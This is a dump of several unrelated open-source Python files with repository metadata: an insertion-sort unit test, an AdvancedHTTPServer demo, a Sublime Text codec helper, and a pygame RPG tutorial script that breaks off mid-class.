class InsertionSortTester(unittest.TestCase):
# Test sort in default order, i.e., in ascending order.
def test_sort_default(self):
array = read_int_array(os.path.join(BASE_DIR, 'data1.data'))
array = sort(array)
expect = [65, 76, 86, 113, 140, 417, 444, 445, 567, 589, 637, 647, 702, 864, 969]
self.assertEqual(expect, array)
# Test sort in ascending order.
def test_sort_ascending(self):
array = read_int_array(os.path.join(BASE_DIR, 'data1.data'))
array = sort(array, 'asc')
expect = [65, 76, 86, 113, 140, 417, 444, 445, 567, 589, 637, 647, 702, 864, 969]
self.assertEqual(expect, array)
# Test sort in descending order.
def test_sort_descending(self):
array = read_int_array(os.path.join(BASE_DIR, 'data1.data'))
array = sort(array, 'desc')
expect = [969, 864, 702, 647, 637, 589, 567, 445, 444, 417, 140, 113, 86, 76, 65]
self.assertEqual(expect, array)
if __name__ == '__main__':
unittest.main()
| mit | 8,115,982,328,361,374,000 | 28.186047 | 89 | 0.620717 | false |
zeroSteiner/AdvancedHTTPServer | examples/demo.py | 1 | 3045 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# demo.py
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of the project nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
import logging
from advancedhttpserver import *
from advancedhttpserver import __version__
class DemoHandler(RequestHandler):
def on_init(self):
self.handler_map['^redirect-to-google$'] = lambda handler, query: self.respond_redirect('http://www.google.com/')
self.handler_map['^hello-world$'] = self.res_hello_world
self.handler_map['^exception$'] = self.res_exception
self.rpc_handler_map['/xor'] = self.rpc_xor
def res_hello_world(self, query):
message = b'Hello World!\r\n\r\n'
self.send_response(200)
self.send_header('Content-Type', 'text/plain')
self.send_header('Content-Length', len(message))
self.end_headers()
self.wfile.write(message)
return
def rpc_xor(self, key, data):
return ''.join(map(lambda x: chr(ord(x) ^ key), data))
def res_exception(self, query):
raise Exception('this is an exception, oh noes!')
def main():
print("AdvancedHTTPServer version: {0}".format(__version__))
logging.getLogger('').setLevel(logging.DEBUG)
console_log_handler = logging.StreamHandler()
console_log_handler.setLevel(logging.INFO)
console_log_handler.setFormatter(logging.Formatter("%(asctime)s %(levelname)-8s %(message)s"))
logging.getLogger('').addHandler(console_log_handler)
server = AdvancedHTTPServer(DemoHandler)
#server.auth_add_creds('demouser', 'demopass')
server.server_version = 'AdvancedHTTPServerDemo'
try:
server.serve_forever()
except KeyboardInterrupt:
server.shutdown()
return 0
if __name__ == '__main__':
main()
| bsd-3-clause | -4,253,329,966,655,596,500 | 37.544304 | 115 | 0.741544 | false |
nickgzzjr/sublime-gulp | cross_platform_codecs.py | 1 | 1500 | import sublime
import sys
import re
class CrossPlaformCodecs():
@classmethod
def decode_line(self, line):
line = line.rstrip()
decoded_line = self.force_decode(line) if sys.version_info >= (3, 0) else line
decoded_line = re.sub(r'\033\[(\d{1,2}m|\d\w)', '', str(decoded_line))
return decoded_line + "\n"
@classmethod
def force_decode(self, text):
try:
text = text.decode('utf-8')
except UnicodeDecodeError:
if sublime.platform() == "windows":
text = self.decode_windows_line(text)
return text
@classmethod
def decode_windows_line(self, text):
# Import only for Windows
import locale, subprocess
# STDERR gets the wrong encoding, use chcp to get the real one
proccess = subprocess.Popen(["chcp"], shell=True, stdout=subprocess.PIPE)
(chcp, _) = proccess.communicate()
# Decode using the locale preferred encoding (for example 'cp1251') and remove newlines
chcp = chcp.decode(locale.getpreferredencoding()).strip()
# Get the actual number
chcp = chcp.split(" ")[-1]
# Actually decode
return text.decode("cp" + chcp)
@classmethod
def encode_process_command(self, command):
is_sublime_2_and_in_windows = sublime.platform() == "windows" and int(sublime.version()) < 3000
return command.encode(sys.getfilesystemencoding()) if is_sublime_2_and_in_windows else command | mit | -6,632,287,634,719,512,000 | 33.906977 | 103 | 0.624 | false |
sylvan5/pygame | pyrpg/pyrpg24/pyrpg24.py | 1 | 36082 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import pygame
from pygame.locals import *
import codecs
import os
import random
import struct
import sys
SCR_RECT = Rect(0, 0, 640, 480)
GS = 32
DOWN,LEFT,RIGHT,UP = 0,1,2,3
STOP, MOVE = 0, 1 # 移動タイプ
PROB_MOVE = 0.005 # 移動確率
TRANS_COLOR = (190,179,145) # マップチップの透明色
sounds = {} # サウンド
def main():
pygame.init()
screen = pygame.display.set_mode(SCR_RECT.size)
pygame.display.set_caption(u"PyRPG 24 町をつくる")
# サウンドをロード
load_sounds("data", "sound.dat")
# キャラクターチップをロード
load_charachips("data", "charachip.dat")
# マップチップをロード
load_mapchips("data", "mapchip.dat")
# マップとプレイヤー作成
map = Map("field")
player = Player("elf_female2", (1,1), DOWN)
map.add_chara(player)
# メッセージエンジン
msg_engine = MessageEngine()
# メッセージウィンドウ
msgwnd = MessageWindow(Rect(140,334,360,140), msg_engine)
# コマンドウィンドウ
cmdwnd = CommandWindow(Rect(16,16,216,160), msg_engine)
clock = pygame.time.Clock()
while True:
clock.tick(60)
if not msgwnd.is_visible and not cmdwnd.is_visible:
map.update()
msgwnd.update()
offset = calc_offset(player)
map.draw(screen, offset)
msgwnd.draw(screen)
cmdwnd.draw(screen)
show_info(screen, msg_engine, player, map) # デバッグ情報を画面に表示
pygame.display.update()
for event in pygame.event.get():
if event.type == QUIT:
sys.exit()
if event.type == KEYDOWN and event.key == K_ESCAPE:
sys.exit()
# 表示されているウィンドウに応じてイベントハンドラを変更
if cmdwnd.is_visible:
cmdwnd_handler(event, cmdwnd, msgwnd, player, map)
elif msgwnd.is_visible:
msgwnd.next() # 次ページへ
else:
if event.type == KEYDOWN and event.key == K_SPACE:
sounds["pi"].play()
cmdwnd.show()
def cmdwnd_handler(event, cmdwnd, msgwnd, player, map):
"""コマンドウィンドウが開いているときのイベント処理"""
# 矢印キーでコマンド選択
if event.type == KEYDOWN and event.key == K_LEFT:
if cmdwnd.command <= 3: return
cmdwnd.command -= 4
elif event.type == KEYDOWN and event.key == K_RIGHT:
if cmdwnd.command >= 4: return
cmdwnd.command += 4
elif event.type == KEYUP and event.key == K_UP:
if cmdwnd.command == 0 or cmdwnd.command == 4: return
cmdwnd.command -= 1
elif event.type == KEYDOWN and event.key == K_DOWN:
if cmdwnd.command == 3 or cmdwnd.command == 7: return
cmdwnd.command += 1
# スペースキーでコマンド実行
if event.type == KEYDOWN and event.key == K_SPACE:
if cmdwnd.command == CommandWindow.TALK: # はなす
sounds["pi"].play()
cmdwnd.hide()
chara = player.talk(map)
if chara != None:
msgwnd.set(chara.message)
else:
msgwnd.set(u"そのほうこうには だれもいない。")
elif cmdwnd.command == CommandWindow.STATUS: # つよさ
# TODO: ステータスウィンドウ表示
sounds["pi"].play()
cmdwnd.hide()
msgwnd.set(u"つよさウィンドウが ひらくよてい。")
elif cmdwnd.command == CommandWindow.EQUIPMENT: # そうび
# TODO: そうびウィンドウ表示
sounds["pi"].play()
cmdwnd.hide()
msgwnd.set(u"そうびウィンドウが ひらくよてい。")
elif cmdwnd.command == CommandWindow.DOOR: # とびら
sounds["pi"].play()
cmdwnd.hide()
door = player.open(map)
if door != None:
door.open()
map.remove_event(door)
else:
msgwnd.set(u"そのほうこうに とびらはない。")
elif cmdwnd.command == CommandWindow.SPELL: # じゅもん
# TODO: じゅもんウィンドウ表示
sounds["pi"].play()
cmdwnd.hide()
msgwnd.set(u"じゅもんウィンドウが ひらくよてい。")
elif cmdwnd.command == CommandWindow.ITEM: # どうぐ
# TODO: どうぐウィンドウ表示
sounds["pi"].play()
cmdwnd.hide()
msgwnd.set(u"どうぐウィンドウが ひらくよてい。")
elif cmdwnd.command == CommandWindow.TACTICS: # さくせん
# TODO: さくせんウィンドウ表示
sounds["pi"].play()
cmdwnd.hide()
msgwnd.set(u"さくせんウィンドウが ひらくよてい。")
elif cmdwnd.command == CommandWindow.SEARCH: # しらべる
sounds["pi"].play()
cmdwnd.hide()
treasure = player.search(map)
if treasure != None:
treasure.open()
msgwnd.set(u"%s をてにいれた。" % treasure.item)
map.remove_event(treasure)
else:
msgwnd.set(u"しかし なにもみつからなかった。")
def show_info(screen, msg_engine, player, map):
"""デバッグ情報を表示"""
msg_engine.draw_string(screen, (300,10), map.name.upper()) # マップ名
msg_engine.draw_string(screen, (300,40), player.name.upper()) # プレイヤー名
msg_engine.draw_string(screen, (300,70), "%d_%d" % (player.x, player.y)) # プレイヤー座標
def load_sounds(dir, file):
"""サウンドをロードしてsoundsに格納"""
file = os.path.join(dir, file)
fp = open(file, "r")
for line in fp:
line = line.rstrip()
data = line.split(",")
se_name = data[0]
se_file = os.path.join("se", data[1])
sounds[se_name] = pygame.mixer.Sound(se_file)
fp.close()
def load_charachips(dir, file):
"""キャラクターチップをロードしてCharacter.imagesに格納"""
file = os.path.join(dir, file)
fp = open(file, "r")
for line in fp:
line = line.rstrip()
data = line.split(",")
chara_id = int(data[0])
chara_name = data[1]
Character.images[chara_name] = split_image(load_image("charachip", "%s.png" % chara_name))
fp.close()
def load_mapchips(dir, file):
"""マップチップをロードしてMap.imagesに格納"""
file = os.path.join(dir, file)
fp = open(file, "r")
for line in fp:
line = line.rstrip()
data = line.split(",")
mapchip_id = int(data[0])
mapchip_name = data[1]
movable = int(data[2]) # 移動可能か?
transparent = int(data[3]) # 背景を透明にするか?
if transparent == 0:
Map.images.append(load_image("mapchip", "%s.png" % mapchip_name))
else:
Map.images.append(load_image("mapchip", "%s.png" % mapchip_name, TRANS_COLOR))
Map.movable_type.append(movable)
fp.close()
def calc_offset(player):
"""オフセットを計算する"""
offsetx = player.rect.topleft[0] - SCR_RECT.width/2
offsety = player.rect.topleft[1] - SCR_RECT.height/2
return offsetx, offsety
def load_image(dir, file, colorkey=None):
file = os.path.join(dir, file)
try:
image = pygame.image.load(file)
except pygame.error, message:
print "Cannot load image:", file
raise SystemExit, message
image = image.convert()
if colorkey is not None:
if colorkey is -1:
colorkey = image.get_at((0,0))
image.set_colorkey(colorkey, RLEACCEL)
return image
def split_image(image):
"""128x128のキャラクターイメージを32x32の16枚のイメージに分割
分割したイメージを格納したリストを返す"""
imageList = []
for i in range(0, 128, GS):
for j in range(0, 128, GS):
surface = pygame.Surface((GS,GS))
surface.blit(image, (0,0), (j,i,GS,GS))
surface.set_colorkey(surface.get_at((0,0)), RLEACCEL)
surface.convert()
imageList.append(surface)
return imageList
class Map:
# main()のload_mapchips()でセットされる
images = [] # マップチップ(ID->イメージ)
movable_type = [] # マップチップが移動可能か?(0:移動不可, 1:移動可)
def __init__(self, name):
self.name = name
self.row = -1 # 行数
self.col = -1 # 列数
self.map = [] # マップデータ(2次元リスト)
self.charas = [] # マップにいるキャラクターリスト
self.events = [] # マップにあるイベントリスト
self.load() # マップをロード
self.load_event() # イベントをロード
def create(self, dest_map):
"""dest_mapでマップを初期化"""
self.name = dest_map
self.charas = []
self.events = []
self.load()
self.load_event()
def add_chara(self, chara):
"""キャラクターをマップに追加する"""
self.charas.append(chara)
def update(self):
"""マップの更新"""
# マップにいるキャラクターの更新
for chara in self.charas:
chara.update(self) # mapを渡す
def draw(self, screen, offset):
"""マップを描画する"""
offsetx, offsety = offset
# マップの描画範囲を計算
startx = offsetx / GS
endx = startx + SCR_RECT.width/GS + 1
starty = offsety / GS
endy = starty + SCR_RECT.height/GS + 1
# マップの描画
for y in range(starty, endy):
for x in range(startx, endx):
# マップの範囲外はデフォルトイメージで描画
# この条件がないとマップの端に行くとエラー発生
if x < 0 or y < 0 or x > self.col-1 or y > self.row-1:
screen.blit(self.images[self.default], (x*GS-offsetx,y*GS-offsety))
else:
screen.blit(self.images[self.map[y][x]], (x*GS-offsetx,y*GS-offsety))
# このマップにあるイベントを描画
for event in self.events:
event.draw(screen, offset)
# このマップにいるキャラクターを描画
for chara in self.charas:
chara.draw(screen, offset)
def is_movable(self, x, y):
"""(x,y)は移動可能か?"""
# マップ範囲内か?
if x < 0 or x > self.col-1 or y < 0 or y > self.row-1:
return False
# マップチップは移動可能か?
if self.movable_type[self.map[y][x]] == 0:
return False
# キャラクターと衝突しないか?
for chara in self.charas:
if chara.x == x and chara.y == y:
return False
# イベントと衝突しないか?
for event in self.events:
if self.movable_type[event.mapchip] == 0:
if event.x == x and event.y == y:
return False
return True
def get_chara(self, x, y):
"""(x,y)にいるキャラクターを返す。いなければNone"""
for chara in self.charas:
if chara.x == x and chara.y == y:
return chara
return None
def get_event(self, x, y):
"""(x,y)にあるイベントを返す。なければNone"""
for event in self.events:
if event.x == x and event.y == y:
return event
return None
def remove_event(self, event):
"""eventを削除する"""
self.events.remove(event)
def load(self):
"""バイナリファイルからマップをロード"""
file = os.path.join("data", self.name + ".map")
fp = open(file, "rb")
# unpack()はタプルが返されるので[0]だけ抽出
self.row = struct.unpack("i", fp.read(struct.calcsize("i")))[0] # 行数
self.col = struct.unpack("i", fp.read(struct.calcsize("i")))[0] # 列数
self.default = struct.unpack("B", fp.read(struct.calcsize("B")))[0] # デフォルトマップチップ
# マップ
self.map = [[0 for c in range(self.col)] for r in range(self.row)]
for r in range(self.row):
for c in range(self.col):
self.map[r][c] = struct.unpack("B", fp.read(struct.calcsize("B")))[0]
fp.close()
def load_event(self):
"""ファイルからイベントをロード"""
file = os.path.join("data", self.name + ".evt")
# テキスト形式のイベントを読み込む
fp = codecs.open(file, "r", "utf-8")
for line in fp:
line = line.rstrip() # 改行除去
if line.startswith("#"): continue # コメント行は無視
if line == "": continue # 空行は無視
data = line.split(",")
event_type = data[0]
if event_type == "BGM": # BGMイベント
self.play_bgm(data)
elif event_type == "CHARA": # キャラクターイベント
self.create_chara(data)
elif event_type == "MOVE": # 移動イベント
self.create_move(data)
elif event_type == "TREASURE": # 宝箱
self.create_treasure(data)
elif event_type == "DOOR": # とびら
self.create_door(data)
elif event_type == "OBJECT": # 一般オブジェクト(玉座など)
self.create_obj(data)
fp.close()
def play_bgm(self, data):
"""BGMを鳴らす"""
bgm_file = "%s.mp3" % data[1]
bgm_file = os.path.join("bgm", bgm_file)
pygame.mixer.music.load(bgm_file)
pygame.mixer.music.play(-1)
def create_chara(self, data):
"""キャラクターを作成してcharasに追加する"""
name = data[1]
x, y = int(data[2]), int(data[3])
direction = int(data[4])
movetype = int(data[5])
message = data[6]
chara = Character(name, (x,y), direction, movetype, message)
self.charas.append(chara)
def create_move(self, data):
"""移動イベントを作成してeventsに追加する"""
x, y = int(data[1]), int(data[2])
mapchip = int(data[3])
dest_map = data[4]
dest_x, dest_y = int(data[5]), int(data[6])
move = MoveEvent((x,y), mapchip, dest_map, (dest_x,dest_y))
self.events.append(move)
def create_treasure(self, data):
"""宝箱を作成してeventsに追加する"""
x, y = int(data[1]), int(data[2])
item = data[3]
treasure = Treasure((x,y), item)
self.events.append(treasure)
def create_door(self, data):
"""とびらを作成してeventsに追加する"""
x, y = int(data[1]), int(data[2])
door = Door((x,y))
self.events.append(door)
def create_obj(self, data):
"""一般オブジェクトを作成してeventsに追加する"""
x, y = int(data[1]), int(data[2])
mapchip = int(data[3])
obj = Object((x,y), mapchip)
self.events.append(obj)
class Character:
"""一般キャラクタークラス"""
speed = 4 # 1フレームの移動ピクセル数
animcycle = 24 # アニメーション速度
frame = 0
# キャラクターイメージ(mainで初期化)
# キャラクター名 -> 分割画像リストの辞書
images = {}
def __init__(self, name, pos, dir, movetype, message):
self.name = name # プレイヤー名(ファイル名と同じ)
self.image = self.images[name][0] # 描画中のイメージ
self.x, self.y = pos[0], pos[1] # 座標(単位:マス)
self.rect = self.image.get_rect(topleft=(self.x*GS, self.y*GS))
self.vx, self.vy = 0, 0 # 移動速度
self.moving = False # 移動中か?
self.direction = dir # 向き
self.movetype = movetype # 移動タイプ
self.message = message # メッセージ
def update(self, map):
"""キャラクター状態を更新する。
mapは移動可能かの判定に必要。"""
# プレイヤーの移動処理
if self.moving == True:
# ピクセル移動中ならマスにきっちり収まるまで移動を続ける
self.rect.move_ip(self.vx, self.vy)
if self.rect.left % GS == 0 and self.rect.top % GS == 0: # マスにおさまったら移動完了
self.moving = False
self.x = self.rect.left / GS
self.y = self.rect.top / GS
elif self.movetype == MOVE and random.random() < PROB_MOVE:
# 移動中でないならPROB_MOVEの確率でランダム移動開始
self.direction = random.randint(0, 3) # 0-3のいずれか
if self.direction == DOWN:
if map.is_movable(self.x, self.y+1):
self.vx, self.vy = 0, self.speed
self.moving = True
elif self.direction == LEFT:
if map.is_movable(self.x-1, self.y):
self.vx, self.vy = -self.speed, 0
self.moving = True
elif self.direction == RIGHT:
if map.is_movable(self.x+1, self.y):
self.vx, self.vy = self.speed, 0
self.moving = True
elif self.direction == UP:
if map.is_movable(self.x, self.y-1):
self.vx, self.vy = 0, -self.speed
self.moving = True
# キャラクターアニメーション(frameに応じて描画イメージを切り替える)
self.frame += 1
self.image = self.images[self.name][self.direction*4+self.frame/self.animcycle%4]
def draw(self, screen, offset):
"""オフセットを考慮してプレイヤーを描画"""
offsetx, offsety = offset
px = self.rect.topleft[0]
py = self.rect.topleft[1]
screen.blit(self.image, (px-offsetx, py-offsety))
def set_pos(self, x, y, dir):
"""キャラクターの位置と向きをセット"""
self.x, self.y = x, y
self.rect = self.image.get_rect(topleft=(self.x*GS, self.y*GS))
self.direction = dir
def __str__(self):
return "CHARA,%s,%d,%d,%d,%d,%s" % (self.name,self.x,self.y,self.direction,self.movetype,self.message)
class Player(Character):
"""プレイヤークラス"""
def __init__(self, name, pos, dir):
Character.__init__(self, name, pos, dir, False, None)
def update(self, map):
"""プレイヤー状態を更新する。
mapは移動可能かの判定に必要。"""
# プレイヤーの移動処理
if self.moving == True:
# ピクセル移動中ならマスにきっちり収まるまで移動を続ける
self.rect.move_ip(self.vx, self.vy)
if self.rect.left % GS == 0 and self.rect.top % GS == 0: # マスにおさまったら移動完了
self.moving = False
self.x = self.rect.left / GS
self.y = self.rect.top / GS
# TODO: ここに接触イベントのチェックを入れる
event = map.get_event(self.x, self.y)
if isinstance(event, MoveEvent): # MoveEventなら
sounds["step"].play()
dest_map = event.dest_map
dest_x = event.dest_x
dest_y = event.dest_y
map.create(dest_map)
self.set_pos(dest_x, dest_y, DOWN) # プレイヤーを移動先座標へ
map.add_chara(self) # マップに再登録
else:
# プレイヤーの場合、キー入力があったら移動を開始する
pressed_keys = pygame.key.get_pressed()
if pressed_keys[K_DOWN]:
self.direction = DOWN # 移動できるかに関係なく向きは変える
if map.is_movable(self.x, self.y+1):
self.vx, self.vy = 0, self.speed
self.moving = True
elif pressed_keys[K_LEFT]:
self.direction = LEFT
if map.is_movable(self.x-1, self.y):
self.vx, self.vy = -self.speed, 0
self.moving = True
elif pressed_keys[K_RIGHT]:
self.direction = RIGHT
if map.is_movable(self.x+1, self.y):
self.vx, self.vy = self.speed, 0
self.moving = True
elif pressed_keys[K_UP]:
self.direction = UP
if map.is_movable(self.x, self.y-1):
self.vx, self.vy = 0, -self.speed
self.moving = True
# キャラクターアニメーション(frameに応じて描画イメージを切り替える)
self.frame += 1
self.image = self.images[self.name][self.direction*4+self.frame/self.animcycle%4]
def talk(self, map):
"""キャラクターが向いている方向のとなりにキャラクターがいるか調べる"""
# 向いている方向のとなりの座標を求める
nextx, nexty = self.x, self.y
if self.direction == DOWN:
nexty = self.y + 1
event = map.get_event(nextx, nexty)
if isinstance(event, Object) and event.mapchip == 41:
nexty += 1 # テーブルがあったらさらに隣
elif self.direction == LEFT:
nextx = self.x - 1
event = map.get_event(nextx, nexty)
if isinstance(event, Object) and event.mapchip == 41:
nextx -= 1
elif self.direction == RIGHT:
nextx = self.x + 1
event = map.get_event(nextx, nexty)
if isinstance(event, Object) and event.mapchip == 41:
nextx += 1
elif self.direction == UP:
nexty = self.y - 1
event = map.get_event(nextx, nexty)
if isinstance(event, Object) and event.mapchip == 41:
nexty -= 1
# その方向にキャラクターがいるか?
chara = map.get_chara(nextx, nexty)
# キャラクターがいればプレイヤーの方向へ向ける
if chara != None:
if self.direction == DOWN:
chara.direction = UP
elif self.direction == LEFT:
chara.direction = RIGHT
elif self.direction == RIGHT:
chara.direction = LEFT
elif self.direction == UP:
chara.direction = DOWN
chara.update(map) # 向きを変えたので更新
return chara
def search(self, map):
"""足もとに宝箱があるか調べる"""
event = map.get_event(self.x, self.y)
if isinstance(event, Treasure):
return event
return None
def open(self, map):
"""目の前にとびらがあるか調べる"""
# 向いている方向のとなりの座標を求める
nextx, nexty = self.x, self.y
if self.direction == DOWN:
nexty = self.y + 1
elif self.direction == LEFT:
nextx = self.x - 1
elif self.direction == RIGHT:
nextx = self.x + 1
elif self.direction == UP:
nexty = self.y - 1
# その場所にとびらがあるか?
event = map.get_event(nextx, nexty)
if isinstance(event, Door):
return event
return None
class MessageEngine:
FONT_WIDTH = 16
FONT_HEIGHT = 22
WHITE, RED, GREEN, BLUE = 0, 160, 320, 480
def __init__(self):
self.image = load_image("data", "font.png", -1)
self.color = self.WHITE
self.kana2rect = {}
self.create_hash()
def set_color(self, color):
"""文字色をセット"""
self.color = color
# 変な値だったらWHITEにする
if not self.color in [self.WHITE,self.RED,self.GREEN,self.BLUE]:
self.color = self.WHITE
def draw_character(self, screen, pos, ch):
"""1文字だけ描画する"""
x, y = pos
try:
rect = self.kana2rect[ch]
screen.blit(self.image, (x,y), (rect.x+self.color,rect.y,rect.width,rect.height))
except KeyError:
print "描画できない文字があります:%s" % ch
return
def draw_string(self, screen, pos, str):
"""文字列を描画"""
x, y = pos
for i, ch in enumerate(str):
dx = x + self.FONT_WIDTH * i
self.draw_character(screen, (dx,y), ch)
def create_hash(self):
"""文字から座標への辞書を作成"""
filepath = os.path.join("data", "kana2rect.dat")
fp = codecs.open(filepath, "r", "utf-8")
for line in fp.readlines():
line = line.rstrip()
d = line.split(" ")
kana, x, y, w, h = d[0], int(d[1]), int(d[2]), int(d[3]), int(d[4])
self.kana2rect[kana] = Rect(x, y, w, h)
fp.close()
class Window:
"""ウィンドウの基本クラス"""
EDGE_WIDTH = 4 # 白枠の幅
def __init__(self, rect):
self.rect = rect # 一番外側の白い矩形
self.inner_rect = self.rect.inflate(-self.EDGE_WIDTH*2, -self.EDGE_WIDTH*2) # 内側の黒い矩形
self.is_visible = False # ウィンドウを表示中か?
def draw(self, screen):
"""ウィンドウを描画"""
if self.is_visible == False: return
pygame.draw.rect(screen, (255,255,255), self.rect, 0)
pygame.draw.rect(screen, (0,0,0), self.inner_rect, 0)
def show(self):
"""ウィンドウを表示"""
self.is_visible = True
def hide(self):
"""ウィンドウを隠す"""
self.is_visible = False
class MessageWindow(Window):
"""メッセージウィンドウ"""
MAX_CHARS_PER_LINE = 20 # 1行の最大文字数
MAX_LINES_PER_PAGE = 3 # 1行の最大行数(4行目は▼用)
MAX_CHARS_PER_PAGE = 20*3 # 1ページの最大文字数
MAX_LINES = 30 # メッセージを格納できる最大行数
LINE_HEIGHT = 8 # 行間の大きさ
animcycle = 24
def __init__(self, rect, msg_engine):
Window.__init__(self, rect)
self.text_rect = self.inner_rect.inflate(-32, -32) # テキストを表示する矩形
self.text = [] # メッセージ
self.cur_page = 0 # 現在表示しているページ
self.cur_pos = 0 # 現在ページで表示した最大文字数
self.next_flag = False # 次ページがあるか?
self.hide_flag = False # 次のキー入力でウィンドウを消すか?
self.msg_engine = msg_engine # メッセージエンジン
self.cursor = load_image("data", "cursor.png", -1) # カーソル画像
self.frame = 0
def set(self, message):
"""メッセージをセットしてウィンドウを画面に表示する"""
self.cur_pos = 0
self.cur_page = 0
self.next_flag = False
self.hide_flag = False
# 全角スペースで初期化
self.text = [u' '] * (self.MAX_LINES*self.MAX_CHARS_PER_LINE)
# メッセージをセット
p = 0
for i in range(len(message)):
ch = message[i]
if ch == "/": # /は改行文字
self.text[p] = "/"
p += self.MAX_CHARS_PER_LINE
p = (p/self.MAX_CHARS_PER_LINE)*self.MAX_CHARS_PER_LINE
elif ch == "%": # \fは改ページ文字
self.text[p] = "%"
p += self.MAX_CHARS_PER_PAGE
p = (p/self.MAX_CHARS_PER_PAGE)*self.MAX_CHARS_PER_PAGE
else:
self.text[p] = ch
p += 1
self.text[p] = "$" # 終端文字
self.show()
def update(self):
"""メッセージウィンドウを更新する
メッセージが流れるように表示する"""
if self.is_visible:
if self.next_flag == False:
self.cur_pos += 1 # 1文字流す
# テキスト全体から見た現在位置
p = self.cur_page * self.MAX_CHARS_PER_PAGE + self.cur_pos
if self.text[p] == "/": # 改行文字
self.cur_pos += self.MAX_CHARS_PER_LINE
self.cur_pos = (self.cur_pos/self.MAX_CHARS_PER_LINE) * self.MAX_CHARS_PER_LINE
elif self.text[p] == "%": # 改ページ文字
self.cur_pos += self.MAX_CHARS_PER_PAGE
self.cur_pos = (self.cur_pos/self.MAX_CHARS_PER_PAGE) * self.MAX_CHARS_PER_PAGE
elif self.text[p] == "$": # 終端文字
self.hide_flag = True
# 1ページの文字数に達したら▼を表示
if self.cur_pos % self.MAX_CHARS_PER_PAGE == 0:
self.next_flag = True
self.frame += 1
def draw(self, screen):
"""メッセージを描画する
メッセージウィンドウが表示されていないときは何もしない"""
Window.draw(self, screen)
if self.is_visible == False: return
# 現在表示しているページのcur_posまでの文字を描画
for i in range(self.cur_pos):
ch = self.text[self.cur_page*self.MAX_CHARS_PER_PAGE+i]
if ch == "/" or ch == "%" or ch == "$": continue # 制御文字は表示しない
dx = self.text_rect[0] + MessageEngine.FONT_WIDTH * (i % self.MAX_CHARS_PER_LINE)
dy = self.text_rect[1] + (self.LINE_HEIGHT+MessageEngine.FONT_HEIGHT) * (i / self.MAX_CHARS_PER_LINE)
self.msg_engine.draw_character(screen, (dx,dy), ch)
# 最後のページでない場合は▼を表示
if (not self.hide_flag) and self.next_flag:
if self.frame / self.animcycle % 2 == 0:
dx = self.text_rect[0] + (self.MAX_CHARS_PER_LINE/2) * MessageEngine.FONT_WIDTH - MessageEngine.FONT_WIDTH/2
dy = self.text_rect[1] + (self.LINE_HEIGHT + MessageEngine.FONT_HEIGHT) * 3
screen.blit(self.cursor, (dx,dy))
def next(self):
"""メッセージを先に進める"""
# 現在のページが最後のページだったらウィンドウを閉じる
if self.hide_flag:
self.hide()
# ▼が表示されてれば次のページへ
if self.next_flag:
self.cur_page += 1
self.cur_pos = 0
self.next_flag = False
class CommandWindow(Window):
LINE_HEIGHT = 8 # 行間の大きさ
TALK, STATUS, EQUIPMENT, DOOR, SPELL, ITEM, TACTICS, SEARCH = range(0, 8)
COMMAND = [u"はなす", u"つよさ", u"そうび", u"とびら",
u"じゅもん", u"どうぐ", u"さくせん", u"しらべる"]
def __init__(self, rect, msg_engine):
Window.__init__(self, rect)
self.text_rect = self.inner_rect.inflate(-32, -32)
self.command = self.TALK # 選択中のコマンド
self.msg_engine = msg_engine
self.cursor = load_image("data", "cursor2.png", -1)
self.frame = 0
def draw(self, screen):
Window.draw(self, screen)
if self.is_visible == False: return
# はなす、つよさ、そうび、とびらを描画
for i in range(0, 4):
dx = self.text_rect[0] + MessageEngine.FONT_WIDTH
dy = self.text_rect[1] + (self.LINE_HEIGHT+MessageEngine.FONT_HEIGHT) * (i % 4)
self.msg_engine.draw_string(screen, (dx,dy), self.COMMAND[i])
# じゅもん、どうぐ、さくせん、しらべるを描画
for i in range(4, 8):
dx = self.text_rect[0] + MessageEngine.FONT_WIDTH * 6
dy = self.text_rect[1] + (self.LINE_HEIGHT+MessageEngine.FONT_HEIGHT) * (i % 4)
self.msg_engine.draw_string(screen, (dx,dy), self.COMMAND[i])
# 選択中のコマンドの左側に▶を描画
dx = self.text_rect[0] + MessageEngine.FONT_WIDTH * 5 * (self.command / 4)
dy = self.text_rect[1] + (self.LINE_HEIGHT+MessageEngine.FONT_HEIGHT) * (self.command % 4)
screen.blit(self.cursor, (dx,dy))
def show(self):
"""オーバーライド"""
self.command = self.TALK # 追加
self.is_visible = True
class MoveEvent():
"""移動イベント"""
def __init__(self, pos, mapchip, dest_map, dest_pos):
self.x, self.y = pos[0], pos[1] # イベント座標
self.mapchip = mapchip # マップチップ
self.dest_map = dest_map # 移動先マップ名
self.dest_x, self.dest_y = dest_pos[0], dest_pos[1] # 移動先座標
self.image = Map.images[self.mapchip]
self.rect = self.image.get_rect(topleft=(self.x*GS, self.y*GS))
def draw(self, screen, offset):
"""オフセットを考慮してイベントを描画"""
offsetx, offsety = offset
px = self.rect.topleft[0]
py = self.rect.topleft[1]
screen.blit(self.image, (px-offsetx, py-offsety))
def __str__(self):
